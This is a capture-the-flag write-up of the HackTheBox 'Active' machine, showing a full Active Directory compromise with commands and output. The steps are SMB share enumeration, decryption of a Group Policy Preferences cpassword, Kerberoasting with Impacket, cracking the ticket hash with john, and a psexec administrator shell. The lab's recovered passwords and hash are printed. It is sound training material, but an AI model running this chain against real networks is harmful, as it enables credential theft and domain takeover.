Active - HackTheBox
I started by doing a scan with Nmap to see what ports and services the machine had open.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sS --min-rate=5000 -v -Pn -n 10.10.10.100 -oG allPorts
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:56 CEST
Initiating SYN Stealth Scan at 15:56
Scanning 10.10.10.100 [1000 ports]
Discovered open port 139/tcp on 10.10.10.100
Discovered open port 445/tcp on 10.10.10.100
Discovered open port 53/tcp on 10.10.10.100
Discovered open port 135/tcp on 10.10.10.100
Discovered open port 464/tcp on 10.10.10.100
Discovered open port 389/tcp on 10.10.10.100
Discovered open port 49154/tcp on 10.10.10.100
Discovered open port 88/tcp on 10.10.10.100
Discovered open port 49153/tcp on 10.10.10.100
Discovered open port 49152/tcp on 10.10.10.100
Discovered open port 3268/tcp on 10.10.10.100
Discovered open port 49157/tcp on 10.10.10.100
Discovered open port 49155/tcp on 10.10.10.100
Discovered open port 636/tcp on 10.10.10.100
Discovered open port 49158/tcp on 10.10.10.100
Discovered open port 3269/tcp on 10.10.10.100
Discovered open port 593/tcp on 10.10.10.100
Completed SYN Stealth Scan at 15:56, 0.57s elapsed (1000 total ports)
Nmap scan report for 10.10.10.100
Host is up (0.12s latency).
Not shown: 983 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49157/tcp open unknown
49158/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.65 seconds
Raw packets sent: 1258 (55.352KB) | Rcvd: 1017 (40.748KB)
Since there are many ports I used the extractports utility from s4vitar to extract the ports and copy them to the clipboard.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ extractPorts allPorts
[*] Extracting information...
[*] IP Address: 10.10.10.100
[*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158
[*] Ports copied to clipboard
Perform another scan with Nmap to detect the version and service of each port.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ nmap -sC -sV -p53,88,135,139,389,445,464,593,636,3268,3269,49152,49153,49154,49155,49157,49158 10.10.10.100 -oN targeted
Starting Nmap 7.80 ( https://nmap.org ) at 2021-07-02 15:58 CEST
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.083s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-02 13:58:25Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-07-02T13:59:22
|_ start_date: 2021-07-02T05:29:12
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 190.44 seconds
It appears you were dealing with an “Active Directory” machine, list the shares with smbmap.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbmap -H 10.10.10.100
[+] IP: 10.10.10.100:445 Name: active.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ NO ACCESS Remote IPC
NETLOGON NO ACCESS Logon server share
Replication READ ONLY
SYSVOL NO ACCESS Logon server share
Users NO ACCESS
I had read privileges to the “Replication” share, I accessed it using smbclient.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ smbclient //10.10.10.100/Replication
Enter WORKGROUP\root's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
10459647 blocks of size 4096. 5672398 blocks available
There was a directory called active.htb, after accessing multiple folders within active.htb I found a Groups.xml.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> dir
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
Groups.xml A 533 Wed Jul 18 22:46:06 2018
10459647 blocks of size 4096. 5659592 blocks available
I downloaded it with get to see what it had.
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1,1 KiloBytes/sec) (average 1,1 KiloBytes/sec)
I found an encrypted group policy preferences key.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ cat Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
Microsoft’s encryption key was exposed, so it could be decrypted with gpp-decrypt.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18
This credential was used to access the Users shared resource through smbcclient using the user SVC_TGS.
smbclient //10.10.10.100/Users -U SVC_TGS
Enter WORKGROUP\SVC_TGS's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
10459647 blocks of size 4096. 5752856 blocks available
smb: \>
The user flag was set to “Desktop”.
smb: \SVC_TGS\> cd Desktop
smb: \SVC_TGS\Desktop\> dir
. D 0 Sat Jul 21 17:14:42 2018
.. D 0 Sat Jul 21 17:14:42 2018
user.txt A 34 Sat Jul 21 17:06:25 2018
10459647 blocks of size 4096. 5725616 blocks available
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
ESCALADA DE PRIVILEGIOS
Now all that was missing was the escalation of privileges, I had Kerberos open, so I tried to “dump” the Service Ticket of the Administrator user using the tool
GetUserSPNs.py.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -request active.htb/SVC_TGS
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2021-07-02 14:02:15.297853
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$52c96a7ddddd702dae79bd0732934059$7735d53223943a5430499440d06612a7c6ee471b2f2cc4c653f1a3e2d8ab883f594b9cdc29ab44b5b7ab251ac0f34c41e38a8ece0d6e4a1c256319223b972d6bfbc203acd1622be80eb5fb85b65a7db42174b3b7ad6db2af3b0c0c8d18da1a0fc7cdeed73d1ef82737069808f606d76dcd36e361dd4d8b31fdcbdfad6574c1e91d79192d6c45ad0085d99daa56eec6d71f9c11e9c53d5f79db13ad07aa235927097c395b8af9c40b80a71bc89f3b2cc61affdd80993917601af9873bfe739f0f208540c8fdaebcf6e92609503405da2b15d57e878d1a004a96cb3ea067728d8818869166e92992b9a23dbda2ca9b4f87775ea85dfcd6baf0ca2d5dbfa6e41cbea009ee34b9348ca95d1e53a27c330e3e7ccc6dd20921869ef640977ba2feb99bf80a011f8e5bb3d873ebb5522f24a1f7dcd937ae68270472c99ee8694e1b7905a010e7357d551165d0a1e3cb43333f4c9fd5919e90681f2c1894c9b679120c8b05dafb1b85615031a9e35cc6a4d020e67bac06a36a0f24158f35f323c56fe08dc99f29bcb3e95722e7dc7ee848181bb22dd6e23e13639c7ac58e042d8c509a25c8aa7b9a9602e5d2875ec793134dcaf63b9e8b56646607369ad7f8de5b72ab985835b9f40d3546bdd8ce2252b48e027bb4f88cd3a8bf412edb7fcaeeff8b4d48e905320732a4811a6f11e9280edfc65ec6d40849e18305576cc0f41d6cc778a6f4f7bec0601b246cbf01da90204e5dafbd4c101a22a0f3d9fc01513d867f085fa5e18e96822fd7356d0441c7625a64851a460e21a2f65844476ca4cb475e0d00b952559766a53a4135cb113fb3dad27fb098ee39e2f5cb3ac61c6f0d999cabce7d85b8991ddfa34b2fcd6744d8d39cc580a2d08832967ee75f8f04dc82917803258b3ddd7aa551c7588fc6f758ceb61261d591e77333ce537cbeb9d5c4749cb3d5623d6caff555603d6d37a2ad530248996dde04bb237c2d177eb971941937ce8f75022b73623299440d658cf91d47a0717675a62c0fa2209438fb4d8dbd772068de84b5dc446baeff1a859e01a8702c8cee55a5cac2f18d1a6cb28b3f15657e173639fd31b8cf4f4164eb048a4edd98144bade4d305ca944dea76de38b24644dd5882f276d563dff2a451360fe9c91509f80254986be1801d3c2aff3af76e1ebf592b75f0c8b268b5599b0d7baa197be3ee81a8af4acbff620c40fb822ea54f372a0b033e596753ac007722eba845a94b803d4fcf04dc3c83f2
Perfect, I already had it, I brute-forced it with “john the ripper” and with a bit of luck I managed to decrypt it.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ john --wordlist=/usr/share/wordlists/rockyou.txt hash
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)
1g 0:00:00:10 DONE (2021-07-02 16:13) 0.09140g/s 963229p/s 963229c/s 963229C/s Tiffani1432..Thurman16
Use the "--show" option to display all of the cracked passwords reliably
Session completed
I tested to see if this credential had access with psexec.py and it seems that it did.
┌─[root@parrot]─[/home/wackyhacker/Desktop]
└──╼ python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@active.htb
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file lXTmpLED.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Igur on active.htb.....
[*] Starting service Igur.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Leave a comment